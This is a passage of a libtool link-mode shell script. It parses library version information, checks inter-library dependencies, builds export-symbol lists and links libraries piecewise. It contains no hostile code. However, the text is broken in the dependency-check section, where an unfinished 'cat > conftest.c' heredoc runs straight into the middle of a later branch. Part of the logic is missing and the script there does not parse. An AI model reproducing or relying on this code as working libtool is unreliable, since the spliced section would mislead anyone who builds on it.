oldlib) if test -n "$dlfiles$dlprefiles" || test no != "$dlself"; then func_warning "'-dlopen' is ignored for archives" fi case " $deplibs" in *\ -l* | *\ -L*) func_warning "'-l' and '-L' are ignored for archives" ;; esac test -n "$rpath" && \ func_warning "'-rpath' is ignored for archives" test -n "$xrpath" && \ func_warning "'-R' is ignored for archives" test -n "$vinfo" && \ func_warning "'-version-info/-version-number' is ignored for archives" test -n "$release" && \ func_warning "'-release' is ignored for archives" test -n "$export_symbols$export_symbols_regex" && \ func_warning "'-export-symbols' is ignored for archives" # Now set the variables for building old libraries. build_libtool_libs=no oldlibs=$output func_append objs "$old_deplibs" ;; lib) # Make sure we only generate libraries of the form 'libNAME.la'. case $outputname in lib*) func_stripname 'lib' '.la' "$outputname" name=$func_stripname_result eval shared_ext=\"$shrext_cmds\" eval libname=\"$libname_spec\" ;; *) test no = "$module" \ && func_fatal_help "libtool library '$output' must begin with 'lib'" if test no != "$need_lib_prefix"; then # Add the "lib" prefix for modules if required func_stripname '' '.la' "$outputname" name=$func_stripname_result eval shared_ext=\"$shrext_cmds\" eval libname=\"$libname_spec\" else func_stripname '' '.la' "$outputname" libname=$func_stripname_result fi ;; esac if test -n "$objs"; then if test pass_all != "$deplibs_check_method"; then func_fatal_error "cannot build libtool library '$output' from non-libtool objects on this host:$objs" else echo $ECHO "*** Warning: Linking the shared library $output against the non-libtool" $ECHO "*** objects $objs is not portable!" func_append libobjs " $objs" fi fi test no = "$dlself" \ || func_warning "'-dlopen self' is ignored for libtool libraries" set dummy $rpath shift test 1 -lt "$#" \ && func_warning "ignoring multiple '-rpath's for a libtool library" install_libdir=$1 oldlibs= if test -z "$rpath"; then if test yes = "$build_libtool_libs"; then # Building a libtool convenience library. # Some compilers have problems with a '.al' extension so # convenience libraries should have the same extension an # archive normally would. oldlibs="$output_objdir/$libname.$libext $oldlibs" build_libtool_libs=convenience build_old_libs=yes fi test -n "$vinfo" && \ func_warning "'-version-info/-version-number' is ignored for convenience libraries" test -n "$release" && \ func_warning "'-release' is ignored for convenience libraries" else # Parse the version information argument. save_ifs=$IFS; IFS=: set dummy $vinfo 0 0 0 shift IFS=$save_ifs test -n "$7" && \ func_fatal_help "too many parameters to '-version-info'" # convert absolute version numbers to libtool ages # this retains compatibility with .la files and attempts # to make the code below a bit more comprehensible case $vinfo_number in yes) number_major=$1 number_minor=$2 number_revision=$3 # # There are really only two kinds -- those that # use the current revision as the major version # and those that subtract age and use age as # a minor version. But, then there is irix # that has an extra 1 added just for fun # case $version_type in # correct linux to gnu/linux during the next big refactor darwin|freebsd-elf|linux|osf|windows|none) func_arith $number_major + $number_minor current=$func_arith_result age=$number_minor revision=$number_revision ;; freebsd-aout|qnx|sunos) current=$number_major revision=$number_minor age=0 ;; irix|nonstopux) func_arith $number_major + $number_minor current=$func_arith_result age=$number_minor revision=$number_minor lt_irix_increment=no ;; esac ;; no) current=$1 revision=$2 age=$3 ;; esac # Check that each of the things are valid numbers. case $current in 0|[1-9]|[1-9][0-9]|[1-9][0-9][0-9]|[1-9][0-9][0-9][0-9]|[1-9][0-9][0-9][0-9][0-9]) ;; *) func_error "CURRENT '$current' must be a nonnegative integer" func_fatal_error "'$vinfo' is not valid version information" ;; esac case $revision in 0|[1-9]|[1-9][0-9]|[1-9][0-9][0-9]|[1-9][0-9][0-9][0-9]|[1-9][0-9][0-9][0-9][0-9]) ;; *) func_error "REVISION '$revision' must be a nonnegative integer" func_fatal_error "'$vinfo' is not valid version information" ;; esac case $age in 0|[1-9]|[1-9][0-9]|[1-9][0-9][0-9]|[1-9][0-9][0-9][0-9]|[1-9][0-9][0-9][0-9][0-9]) ;; *) func_error "AGE '$age' must be a nonnegative integer" func_fatal_error "'$vinfo' is not valid version information" ;; esac if test "$age" -gt "$current"; then func_error "AGE '$age' is greater than the current interface number '$current'" func_fatal_error "'$vinfo' is not valid version information" fi # Calculate the version variables. major= versuffix= verstring= case $version_type in none) ;; darwin) # Like Linux, but with the current version available in # verstring for coding it into the library header func_arith $current - $age major=.$func_arith_result versuffix=$major.$age.$revision # Darwin ld doesn't like 0 for these options... func_arith $current + 1 minor_current=$func_arith_result xlcverstring="$wl-compatibility_version $wl$minor_current $wl-current_version $wl$minor_current.$revision" verstring="-compatibility_version $minor_current -current_version $minor_current.$revision" # On Darwin other compilers case $CC in nagfor*) verstring="$wl-compatibility_version $wl$minor_current $wl-current_version $wl$minor_current.$revision" ;; *) verstring="-compatibility_version $minor_current -current_version $minor_current.$revision" ;; esac ;; freebsd-aout) major=.$current versuffix=.$current.$revision ;; freebsd-elf) func_arith $current - $age major=.$func_arith_result versuffix=$major.$age.$revision ;; irix | nonstopux) if test no = "$lt_irix_increment"; then func_arith $current - $age else func_arith $current - $age + 1 fi major=$func_arith_result case $version_type in nonstopux) verstring_prefix=nonstopux ;; *) verstring_prefix=sgi ;; esac verstring=$verstring_prefix$major.$revision # Add in all the interfaces that we are compatible with. loop=$revision while test 0 -ne "$loop"; do func_arith $revision - $loop iface=$func_arith_result func_arith $loop - 1 loop=$func_arith_result verstring=$verstring_prefix$major.$iface:$verstring done # Before this point, $major must not contain '.'. major=.$major versuffix=$major.$revision ;; linux) # correct to gnu/linux during the next big refactor func_arith $current - $age major=.$func_arith_result versuffix=$major.$age.$revision ;; osf) func_arith $current - $age major=.$func_arith_result versuffix=.$current.$age.$revision verstring=$current.$age.$revision # Add in all the interfaces that we are compatible with. loop=$age while test 0 -ne "$loop"; do func_arith $current - $loop iface=$func_arith_result func_arith $loop - 1 loop=$func_arith_result verstring=$verstring:$iface.0 done # Make executables depend on our current version. func_append verstring ":$current.0" ;; qnx) major=.$current versuffix=.$current ;; sco) major=.$current versuffix=.$current ;; sunos) major=.$current versuffix=.$current.$revision ;; windows) # Use '-' rather than '.', since we only want one # extension on DOS 8.3 file systems. func_arith $current - $age major=$func_arith_result versuffix=-$major ;; *) func_fatal_configuration "unknown library version type '$version_type'" ;; esac # Clear the version info if we defaulted, and they specified a release. if test -z "$vinfo" && test -n "$release"; then major= case $version_type in darwin) # we can't check for "0.0" in archive_cmds due to quoting # problems, so we reset it completely verstring= ;; *) verstring=0.0 ;; esac if test no = "$need_version"; then versuffix= else versuffix=.0.0 fi fi # Remove version info from name if versioning should be avoided if test yes,no = "$avoid_version,$need_version"; then major= versuffix= verstring= fi # Check to see if the archive will have undefined symbols. if test yes = "$allow_undefined"; then if test unsupported = "$allow_undefined_flag"; then if test yes = "$build_old_libs"; then func_warning "undefined symbols not allowed in $host shared libraries; building static only" build_libtool_libs=no else func_fatal_error "can't build $host shared library unless -no-undefined is specified" fi fi else # Don't allow undefined symbols. allow_undefined_flag=$no_undefined_flag fi fi func_generate_dlsyms "$libname" "$libname" : func_append libobjs " $symfileobj" test " " = "$libobjs" && libobjs= if test relink != "$opt_mode"; then # Remove our outputs, but don't remove object files since they # may have been created when compiling PIC objects. removelist= tempremovelist=`$ECHO "$output_objdir/*"` for p in $tempremovelist; do case $p in *.$objext | *.gcno) ;; $output_objdir/$outputname | $output_objdir/$libname.* | $output_objdir/$libname$release.*) if test -n "$precious_files_regex"; then if $ECHO "$p" | $EGREP -e "$precious_files_regex" >/dev/null 2>&1 then continue fi fi func_append removelist " $p" ;; *) ;; esac done test -n "$removelist" && \ func_show_eval "${RM}r \$removelist" fi # Now set the variables for building old libraries. if test yes = "$build_old_libs" && test convenience != "$build_libtool_libs"; then func_append oldlibs " $output_objdir/$libname.$libext" # Transform .lo files to .o files. oldobjs="$objs "`$ECHO "$libobjs" | $SP2NL | $SED "/\.$libext$/d; $lo2o" | $NL2SP` fi # Eliminate all temporary directories. #for path in $notinst_path; do # lib_search_path=`$ECHO "$lib_search_path " | $SED "s% $path % %g"` # deplibs=`$ECHO "$deplibs " | $SED "s% -L$path % %g"` # dependency_libs=`$ECHO "$dependency_libs " | $SED "s% -L$path % %g"` #done if test -n "$xrpath"; then # If the user specified any rpath flags, then add them. temp_xrpath= for libdir in $xrpath; do func_replace_sysroot "$libdir" func_append temp_xrpath " -R$func_replace_sysroot_result" case "$finalize_rpath " in *" $libdir "*) ;; *) func_append finalize_rpath " $libdir" ;; esac done if test yes != "$hardcode_into_libs" || test yes = "$build_old_libs"; then dependency_libs="$temp_xrpath $dependency_libs" fi fi # Make sure dlfiles contains only unique files that won't be dlpreopened old_dlfiles=$dlfiles dlfiles= for lib in $old_dlfiles; do case " $dlprefiles $dlfiles " in *" $lib "*) ;; *) func_append dlfiles " $lib" ;; esac done # Make sure dlprefiles contains only unique files old_dlprefiles=$dlprefiles dlprefiles= for lib in $old_dlprefiles; do case "$dlprefiles " in *" $lib "*) ;; *) func_append dlprefiles " $lib" ;; esac done if test yes = "$build_libtool_libs"; then if test -n "$rpath"; then case $host in *-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-*-beos* | *-cegcc* | *-*-haiku*) # these systems don't actually have a c library (as such)! ;; *-*-rhapsody* | *-*-darwin1.[012]) # Rhapsody C library is in the System framework func_append deplibs " System.ltframework" ;; *-*-netbsd*) # Don't link with libc until the a.out ld.so is fixed. ;; *-*-openbsd* | *-*-freebsd* | *-*-dragonfly*) # Do not include libc due to us having libc/libc_r. ;; *-*-sco3.2v5* | *-*-sco5v6*) # Causes problems with __ctype ;; *-*-sysv4.2uw2* | *-*-sysv5* | *-*-unixware* | *-*-OpenUNIX*) # Compiler inserts libc in the correct place for threads to work ;; *) # Add libc to deplibs on all other systems if necessary. if test yes = "$build_libtool_need_lc"; then func_append deplibs " -lc" fi ;; esac fi # Transform deplibs into only deplibs that can be linked in shared. name_save=$name libname_save=$libname release_save=$release versuffix_save=$versuffix major_save=$major # I'm not sure if I'm treating the release correctly. I think # release should show up in the -l (ie -lgmp5) so we don't want to # add it in twice. Is that correct? release= versuffix= major= newdeplibs= droppeddeps=no case $deplibs_check_method in pass_all) # Don't check for shared/static. Everything works. # This might be a little naive. We might want to check # whether the library exists or not. But this is on # osf3 & osf4 and I'm not really sure... Just # implementing what was already the behavior. newdeplibs=$deplibs ;; test_compile) # This code stresses the "libraries are programs" paradigm to its # limits. Maybe even breaks it. We compile a program, linking it # against the deplibs as a proxy for the library. Then we can check # whether they linked in statically or dynamically with ldd. $opt_dry_run || $RM conftest.c cat > conftest.c </dev/null` $nocaseglob else potential_libs=`ls $i/$libnameglob[.-]* 2>/dev/null` fi for potent_lib in $potential_libs; do # Follow soft links. if ls -lLd "$potent_lib" 2>/dev/null | $GREP " -> " >/dev/null; then continue fi # The statement above tries to avoid entering an # endless loop below, in case of cyclic links. # We might still enter an endless loop, since a link # loop can be closed while we follow links, # but so what? potlib=$potent_lib while test -h "$potlib" 2>/dev/null; do potliblink=`ls -ld $potlib | $SED 's/.* -> //'` case $potliblink in [\\/]* | [A-Za-z]:[\\/]*) potlib=$potliblink;; *) potlib=`$ECHO "$potlib" | $SED 's|[^/]*$||'`"$potliblink";; esac done if eval $file_magic_cmd \"\$potlib\" 2>/dev/null | $SED -e 10q | $EGREP "$file_magic_regex" > /dev/null; then func_append newdeplibs " $a_deplib" a_deplib= break 2 fi done done fi if test -n "$a_deplib"; then droppeddeps=yes echo $ECHO "*** Warning: linker path does not have real file for library $a_deplib." echo "*** I have the capability to make that library automatically link in when" echo "*** you link to this library. But I can only do this if you have a" echo "*** shared version of the library, which you do not appear to have" echo "*** because I did check the linker path looking for a file starting" if test -z "$potlib"; then $ECHO "*** with $libname but no candidates were found. (...for file magic test)" else $ECHO "*** with $libname and none of the candidates passed a file format test" $ECHO "*** using a file magic. Last file checked: $potlib" fi fi ;; *) # Add a -L argument. func_append newdeplibs " $a_deplib" ;; esac done # Gone through all deplibs. ;; match_pattern*) set dummy $deplibs_check_method; shift match_pattern_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"` for a_deplib in $deplibs; do case $a_deplib in -l*) func_stripname -l '' "$a_deplib" name=$func_stripname_result if test yes = "$allow_libtool_libs_with_static_runtimes"; then case " $predeps $postdeps " in *" $a_deplib "*) func_append newdeplibs " $a_deplib" a_deplib= ;; esac fi if test -n "$a_deplib"; then libname=`eval "\\$ECHO \"$libname_spec\""` for i in $lib_search_path $sys_lib_search_path $shlib_search_path; do potential_libs=`ls $i/$libname[.-]* 2>/dev/null` for potent_lib in $potential_libs; do potlib=$potent_lib # see symlink-check above in file_magic test if eval "\$ECHO \"$potent_lib\"" 2>/dev/null | $SED 10q | \ $EGREP "$match_pattern_regex" > /dev/null; then func_append newdeplibs " $a_deplib" a_deplib= break 2 fi done done fi if test -n "$a_deplib"; then droppeddeps=yes echo $ECHO "*** Warning: linker path does not have real file for library $a_deplib." echo "*** I have the capability to make that library automatically link in when" echo "*** you link to this library. But I can only do this if you have a" echo "*** shared version of the library, which you do not appear to have" echo "*** because I did check the linker path looking for a file starting" if test -z "$potlib"; then $ECHO "*** with $libname but no candidates were found. (...for regex pattern test)" else $ECHO "*** with $libname and none of the candidates passed a file format test" $ECHO "*** using a regex pattern. Last file checked: $potlib" fi fi ;; *) # Add a -L argument. func_append newdeplibs " $a_deplib" ;; esac done # Gone through all deplibs. ;; none | unknown | *) newdeplibs= tmp_deplibs=`$ECHO " $deplibs" | $SED 's/ -lc$//; s/ -[LR][^ ]*//g'` if test yes = "$allow_libtool_libs_with_static_runtimes"; then for i in $predeps $postdeps; do # can't use Xsed below, because $i might contain '/' tmp_deplibs=`$ECHO " $tmp_deplibs" | $SED "s|$i||"` done fi case $tmp_deplibs in *[!\ \ ]*) echo if test none = "$deplibs_check_method"; then echo "*** Warning: inter-library dependencies are not supported in this platform." else echo "*** Warning: inter-library dependencies are not known to be supported." fi echo "*** All declared inter-library dependencies are being dropped." droppeddeps=yes ;; esac ;; esac versuffix=$versuffix_save major=$major_save release=$release_save libname=$libname_save name=$name_save case $host in *-*-rhapsody* | *-*-darwin1.[012]) # On Rhapsody replace the C library with the System framework newdeplibs=`$ECHO " $newdeplibs" | $SED 's/ -lc / System.ltframework /'` ;; esac if test yes = "$droppeddeps"; then if test yes = "$module"; then echo echo "*** Warning: libtool could not satisfy all declared inter-library" $ECHO "*** dependencies of module $libname. Therefore, libtool will create" echo "*** a static module, that should work as long as the dlopening" echo "*** application is linked with the -dlopen flag." if test -z "$global_symbol_pipe"; then echo echo "*** However, this would only work if libtool was able to extract symbol" echo "*** lists from a program, using 'nm' or equivalent, but libtool could" echo "*** not find such a program. So, this module is probably useless." echo "*** 'nm' from GNU binutils and a full rebuild may help." fi if test no = "$build_old_libs"; then oldlibs=$output_objdir/$libname.$libext build_libtool_libs=module build_old_libs=yes else build_libtool_libs=no fi else echo "*** The inter-library dependencies that have been dropped here will be" echo "*** automatically added whenever a program is linked with this library" echo "*** or is declared to -dlopen it." if test no = "$allow_undefined"; then echo echo "*** Since this library must not contain undefined symbols," echo "*** because either the platform does not support them or" echo "*** it was explicitly requested with -no-undefined," echo "*** libtool will only create a static version of it." if test no = "$build_old_libs"; then oldlibs=$output_objdir/$libname.$libext build_libtool_libs=module build_old_libs=yes else build_libtool_libs=no fi fi fi fi # Done checking deplibs! deplibs=$newdeplibs fi # Time to change all our "foo.ltframework" stuff back to "-framework foo" case $host in *-*-darwin*) newdeplibs=`$ECHO " $newdeplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'` new_inherited_linker_flags=`$ECHO " $new_inherited_linker_flags" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'` deplibs=`$ECHO " $deplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'` ;; esac # move library search paths that coincide with paths to not yet # installed libraries to the beginning of the library search list new_libs= for path in $notinst_path; do case " $new_libs " in *" -L$path/$objdir "*) ;; *) case " $deplibs " in *" -L$path/$objdir "*) func_append new_libs " -L$path/$objdir" ;; esac ;; esac done for deplib in $deplibs; do case $deplib in -L*) case " $new_libs " in *" $deplib "*) ;; *) func_append new_libs " $deplib" ;; esac ;; *) func_append new_libs " $deplib" ;; esac done deplibs=$new_libs # All the library-specific variables (install_libdir is set above). library_names= old_library= dlname= # Test again, we may have decided not to build it any more if test yes = "$build_libtool_libs"; then # Remove $wl instances when linking with ld. # FIXME: should test the right _cmds variable. case $archive_cmds in *\$LD\ *) wl= ;; esac if test yes = "$hardcode_into_libs"; then # Hardcode the library paths hardcode_libdirs= dep_rpath= rpath=$finalize_rpath test relink = "$opt_mode" || rpath=$compile_rpath$rpath for libdir in $rpath; do if test -n "$hardcode_libdir_flag_spec"; then if test -n "$hardcode_libdir_separator"; then func_replace_sysroot "$libdir" libdir=$func_replace_sysroot_result if test -z "$hardcode_libdirs"; then hardcode_libdirs=$libdir else # Just accumulate the unique libdirs. case $hardcode_libdir_separator$hardcode_libdirs$hardcode_libdir_separator in *"$hardcode_libdir_separator$libdir$hardcode_libdir_separator"*) ;; *) func_append hardcode_libdirs "$hardcode_libdir_separator$libdir" ;; esac fi else eval flag=\"$hardcode_libdir_flag_spec\" func_append dep_rpath " $flag" fi elif test -n "$runpath_var"; then case "$perm_rpath " in *" $libdir "*) ;; *) func_append perm_rpath " $libdir" ;; esac fi done # Substitute the hardcoded libdirs into the rpath. if test -n "$hardcode_libdir_separator" && test -n "$hardcode_libdirs"; then libdir=$hardcode_libdirs eval "dep_rpath=\"$hardcode_libdir_flag_spec\"" fi if test -n "$runpath_var" && test -n "$perm_rpath"; then # We should set the runpath_var. rpath= for dir in $perm_rpath; do func_append rpath "$dir:" done eval "$runpath_var='$rpath\$$runpath_var'; export $runpath_var" fi test -n "$dep_rpath" && deplibs="$dep_rpath $deplibs" fi shlibpath=$finalize_shlibpath test relink = "$opt_mode" || shlibpath=$compile_shlibpath$shlibpath if test -n "$shlibpath"; then eval "$shlibpath_var='$shlibpath\$$shlibpath_var'; export $shlibpath_var" fi # Get the real and link names of the library. eval shared_ext=\"$shrext_cmds\" eval library_names=\"$library_names_spec\" set dummy $library_names shift realname=$1 shift if test -n "$soname_spec"; then eval soname=\"$soname_spec\" else soname=$realname fi if test -z "$dlname"; then dlname=$soname fi lib=$output_objdir/$realname linknames= for link do func_append linknames " $link" done # Use standard objects if they are pic test -z "$pic_flag" && libobjs=`$ECHO "$libobjs" | $SP2NL | $SED "$lo2o" | $NL2SP` test "X$libobjs" = "X " && libobjs= delfiles= if test -n "$export_symbols" && test -n "$include_expsyms"; then $opt_dry_run || cp "$export_symbols" "$output_objdir/$libname.uexp" export_symbols=$output_objdir/$libname.uexp func_append delfiles " $export_symbols" fi orig_export_symbols= case $host_os in cygwin* | mingw* | cegcc*) if test -n "$export_symbols" && test -z "$export_symbols_regex"; then # exporting using user supplied symfile func_dll_def_p "$export_symbols" || { # and it's NOT already a .def file. Must figure out # which of the given symbols are data symbols and tag # them as such. So, trigger use of export_symbols_cmds. # export_symbols gets reassigned inside the "prepare # the list of exported symbols" if statement, so the # include_expsyms logic still works. orig_export_symbols=$export_symbols export_symbols= always_export_symbols=yes } fi ;; esac # Prepare the list of exported symbols if test -z "$export_symbols"; then if test yes = "$always_export_symbols" || test -n "$export_symbols_regex"; then func_verbose "generating symbol list for '$libname.la'" export_symbols=$output_objdir/$libname.exp $opt_dry_run || $RM $export_symbols cmds=$export_symbols_cmds save_ifs=$IFS; IFS='~' for cmd1 in $cmds; do IFS=$save_ifs # Take the normal branch if the nm_file_list_spec branch # doesn't work or if tool conversion is not needed. case $nm_file_list_spec~$to_tool_file_cmd in *~func_convert_file_noop | *~func_convert_file_msys_to_w32 | ~*) try_normal_branch=yes eval cmd=\"$cmd1\" func_len " $cmd" len=$func_len_result ;; *) try_normal_branch=no ;; esac if test yes = "$try_normal_branch" \ && { test "$len" -lt "$max_cmd_len" \ || test "$max_cmd_len" -le -1; } then func_show_eval "$cmd" 'exit $?' skipped_export=false elif test -n "$nm_file_list_spec"; then func_basename "$output" output_la=$func_basename_result save_libobjs=$libobjs save_output=$output output=$output_objdir/$output_la.nm func_to_tool_file "$output" libobjs=$nm_file_list_spec$func_to_tool_file_result func_append delfiles " $output" func_verbose "creating $NM input file list: $output" for obj in $save_libobjs; do func_to_tool_file "$obj" $ECHO "$func_to_tool_file_result" done > "$output" eval cmd=\"$cmd1\" func_show_eval "$cmd" 'exit $?' output=$save_output libobjs=$save_libobjs skipped_export=false else # The command line is too long to execute in one step. func_verbose "using reloadable object file for export list..." skipped_export=: # Break out early, otherwise skipped_export may be # set to false by a later but shorter cmd. break fi done IFS=$save_ifs if test -n "$export_symbols_regex" && test : != "$skipped_export"; then func_show_eval '$EGREP -e "$export_symbols_regex" "$export_symbols" > "${export_symbols}T"' func_show_eval '$MV "${export_symbols}T" "$export_symbols"' fi fi fi if test -n "$export_symbols" && test -n "$include_expsyms"; then tmp_export_symbols=$export_symbols test -n "$orig_export_symbols" && tmp_export_symbols=$orig_export_symbols $opt_dry_run || eval '$ECHO "$include_expsyms" | $SP2NL >> "$tmp_export_symbols"' fi if test : != "$skipped_export" && test -n "$orig_export_symbols"; then # The given exports_symbols file has to be filtered, so filter it. func_verbose "filter symbol list for '$libname.la' to tag DATA exports" # FIXME: $output_objdir/$libname.filter potentially contains lots of # 's' commands, which not all seds can handle. GNU sed should be fine # though. Also, the filter scales superlinearly with the number of # global variables. join(1) would be nice here, but unfortunately # isn't a blessed tool. $opt_dry_run || $SED -e '/[ ,]DATA/!d;s,\(.*\)\([ \,].*\),s|^\1$|\1\2|,' < $export_symbols > $output_objdir/$libname.filter func_append delfiles " $export_symbols $output_objdir/$libname.filter" export_symbols=$output_objdir/$libname.def $opt_dry_run || $SED -f $output_objdir/$libname.filter < $orig_export_symbols > $export_symbols fi tmp_deplibs= for test_deplib in $deplibs; do case " $convenience " in *" $test_deplib "*) ;; *) func_append tmp_deplibs " $test_deplib" ;; esac done deplibs=$tmp_deplibs if test -n "$convenience"; then if test -n "$whole_archive_flag_spec" && test yes = "$compiler_needs_object" && test -z "$libobjs"; then # extract the archives, so we have objects to list. # TODO: could optimize this to just extract one archive. whole_archive_flag_spec= fi if test -n "$whole_archive_flag_spec"; then save_libobjs=$libobjs eval libobjs=\"\$libobjs $whole_archive_flag_spec\" test "X$libobjs" = "X " && libobjs= else gentop=$output_objdir/${outputname}x func_append generated " $gentop" func_extract_archives $gentop $convenience func_append libobjs " $func_extract_archives_result" test "X$libobjs" = "X " && libobjs= fi fi if test yes = "$thread_safe" && test -n "$thread_safe_flag_spec"; then eval flag=\"$thread_safe_flag_spec\" func_append linker_flags " $flag" fi # Make a backup of the uninstalled library when relinking if test relink = "$opt_mode"; then $opt_dry_run || eval '(cd $output_objdir && $RM ${realname}U && $MV $realname ${realname}U)' || exit $? fi # Do each of the archive commands. if test yes = "$module" && test -n "$module_cmds"; then if test -n "$export_symbols" && test -n "$module_expsym_cmds"; then eval test_cmds=\"$module_expsym_cmds\" cmds=$module_expsym_cmds else eval test_cmds=\"$module_cmds\" cmds=$module_cmds fi else if test -n "$export_symbols" && test -n "$archive_expsym_cmds"; then eval test_cmds=\"$archive_expsym_cmds\" cmds=$archive_expsym_cmds else eval test_cmds=\"$archive_cmds\" cmds=$archive_cmds fi fi if test : != "$skipped_export" && func_len " $test_cmds" && len=$func_len_result && test "$len" -lt "$max_cmd_len" || test "$max_cmd_len" -le -1; then : else # The command line is too long to link in one step, link piecewise # or, if using GNU ld and skipped_export is not :, use a linker # script. # Save the value of $output and $libobjs because we want to # use them later. If we have whole_archive_flag_spec, we # want to use save_libobjs as it was before # whole_archive_flag_spec was expanded, because we can't # assume the linker understands whole_archive_flag_spec. # This may have to be revisited, in case too many # convenience libraries get linked in and end up exceeding # the spec. if test -z "$convenience" || test -z "$whole_archive_flag_spec"; then save_libobjs=$libobjs fi save_output=$output func_basename "$output" output_la=$func_basename_result # Clear the reloadable object creation command queue and # initialize k to one. test_cmds= concat_cmds= objlist= last_robj= k=1 if test -n "$save_libobjs" && test : != "$skipped_export" && test yes = "$with_gnu_ld"; then output=$output_objdir/$output_la.lnkscript func_verbose "creating GNU ld script: $output" echo 'INPUT (' > $output for obj in $save_libobjs do func_to_tool_file "$obj" $ECHO "$func_to_tool_file_result" >> $output done echo ')' >> $output func_append delfiles " $output" func_to_tool_file "$output" output=$func_to_tool_file_result elif test -n "$save_libobjs" && test : != "$skipped_export" && test -n "$file_list_spec"; then output=$output_objdir/$output_la.lnk func_verbose "creating linker input file list: $output" : > $output set x $save_libobjs shift firstobj= if test yes = "$compiler_needs_object"; then firstobj="$1 " shift fi for obj do func_to_tool_file "$obj" $ECHO "$func_to_tool_file_result" >> $output done func_append delfiles " $output" func_to_tool_file "$output" output=$firstobj\"$file_list_spec$func_to_tool_file_result\" else if test -n "$save_libobjs"; then func_verbose "creating reloadable object files..." output=$output_objdir/$output_la-$k.$objext eval test_cmds=\"$reload_cmds\" func_len " $test_cmds" len0=$func_len_result len=$len0 # Loop over the list of objects to be linked. for obj in $save_libobjs do func_len " $obj" func_arith $len + $func_len_result len=$func_arith_result if test -z "$objlist" || test "$len" -lt "$max_cmd_len"; then func_append objlist " $obj" else # The command $test_cmds is almost too long, add a # command to the queue. if test 1 -eq "$k"; then # The first file doesn't have a previous command to add. reload_objs=$objlist eval concat_cmds=\"$reload_cmds\" else # All subsequent reloadable object files will link in # the last one created. reload_objs="$objlist $last_robj" eval concat_cmds=\"\$concat_cmds~$reload_cmds~\$RM $last_robj\" fi last_robj=$output_objdir/$output_la-$k.$objext func_arith $k + 1 k=$func_arith_result output=$output_objdir/$output_la-$k.$objext objlist=" $obj" func_len " $last_robj" func_arith $len0 + $func_len_result len=$func_arith_result fi done # Handle the remaining objects by creating one last # reloadable object file. All subsequent reloadable object # files will link in the last one created. test -z "$concat_cmds" || concat_cmds=$concat_cmds~ reload_objs="$objlist $last_robj" eval concat_cmds=\"\$concat_cmds$reload_cmds\" if test -n "$last_robj"; then eval concat_cmds=\"\$concat_cmds~\$RM $last_robj\" fi func_append delfiles " $output" else output= fi ${skipped_export-false} && { func_verbose "generating symbol list for '$libname.la'" export_symbols=$output_objdir/$libname.exp $opt_dry_run || $RM $export_symbols libobjs=$output # Append the command to create the export file. test -z "$concat_cmds" || concat_cmds=$concat_cmds~ eval concat_cmds=\"\$concat_cmds$export_symbols_cmds\" if test -n "$last_robj"; then eval concat_cmds=\"\$concat_cmds~\$RM $last_robj\" fi } test -n "$save_libobjs" && func_verbose "creating a temporary reloadable object file: $output" # Loop through the commands generated above and execute them. save_ifs=$IFS; IFS='~' for cmd in $concat_cmds; do IFS=$save_ifs $opt_quiet || { func_quote_arg expand,pretty "$cmd" eval "func_echo $func_quote_arg_result" } $opt_dry_run || eval "$cmd" || { lt_exit=$? # Restore the uninstalled library and exit if test relink = "$opt_mode"; then ( cd "$output_objdir" && \ $RM "${realname}T" && \ $MV "${realname}U" "$realname" ) fi exit $lt_exit } done IFS=$save_ifs if test -n "$export_symbols_regex" && ${skipped_export-false}; then func_show_eval '$EGREP -e "$export_symbols_regex" "$export_symbols" > "${export_symbols}T"' func_show_eval '$MV "${export_symbols}T" "$export_symbols"' fi fi ${skipped_export-false} && { if test -n "$export_symbols" && test -n "$include_expsyms"; then tmp_export_symbols=$export_symbols test -n "$orig_export_symbols" && tmp_export_symbols=$orig_export_symbols $opt_dry_run || eval '$ECHO "$include_expsyms" | $SP2NL >> "$tmp_export_symbols"' fi if test -n "$orig_export_symbols"; then # The given exports_symbols file has to be filtered, so filter it. func_verbose "filter symbol list for '$libname.la' to tag DATA exports" # FIXME: $output_objdir/$libname.filter potentially contains lots of # 's' commands, which not all seds can handle. GNU sed should be fine # though. Also, the filter scales superlinearly with the number of # global variables. join(1) would be nice here, but unfortunately # isn't a blessed tool. $opt_dry_run || $SED -e '/[ ,]DATA/!d;s,\(.*\)\([ \,].*\),s|^\1$|\1\2|,' < $export_symbols > $output_objdir/$libname.filter func_append delfiles " $export_symbols $output_objdir/$libname.filter" export_symbols=$output_objdir/$libname.def $opt_dry_run || $SED -f $output_objdir/$libname.filter < $orig_export_symbols > $export_symbols fi } libobjs=$output # Restore the value of output. output=$save_output if test -n "$convenience" && test -n "$whole_archive_flag_spec"; then eval libobjs=\"\$libobjs $whole_archive_flag_spec\" test "X$libobjs" = "X " && libobjs= fi # Expand the library linking commands again to reset the # value of $libobjs for piecewise linking. # Do each of the archive commands. if test yes = "$module" && test -n "$module_cmds"; then if test -n "$export_symbols" && test -n "$module_expsym_cmds"; then cmds=$module_expsym_cmds else cmds=$module_cmds fi else if test -n "$export_symbols" && test -n "$archive_expsym_cmds"; then cmds=$archive_expsym_cmds else cmds=$archive_cmds fi fi fi if test -n "$delfiles"; then # Append the command to remove temporary files to $cmds. eval cmds=\"\$cmds~\$RM $delfiles\" fi # Add any objects from preloaded convenience libraries if test -n "$dlprefiles"; then gentop=$output_objdir/${outputname}x func_append generated " $gentop" func_extract_archives $gentop $dlprefiles func_append libobjs " $func_extract_archives_result" test "X$libobjs" = "X " && libobjs= fi save_ifs=$IFS; IFS='~' for cmd in $cmds; do IFS=$sp$nl eval cmd=\"$cmd\" IFS=$save_ifs $opt_quiet || { func_quote_arg expand,pretty "$cmd" eval "func_echo $func_quote_arg_result" } $opt_dry_run || eval "$cmd" || { lt_exit=$? # Restore the uninstalled library and exit if test relink = "$opt_mode"; then ( cd "$output_objdir" && \ $RM "${realname}T" && \ $MV "${realname}U" "$realname" ) fi exit $lt_exit } done IFS=$save_ifs # Restore the uninstalled library and exit if test relink = "$opt_mode"; then $opt_dry_run || eval '(cd $output_objdir && $RM ${realname}T && $MV $realname ${realname}T && $MV ${realname}U $realname)' || exit $? if test -n "$convenience"; then if test -z "$whole_archive_flag_spec"; then func_show_eval '${RM}r "$gentop"' fi fi exit $EXIT_SUCCESS fi # Create links to the real library. for linkname in $linknames; do if test "$realname" != "$linkname"; then func_show_eval '(cd "$output_objdir" && $RM "$linkname" && 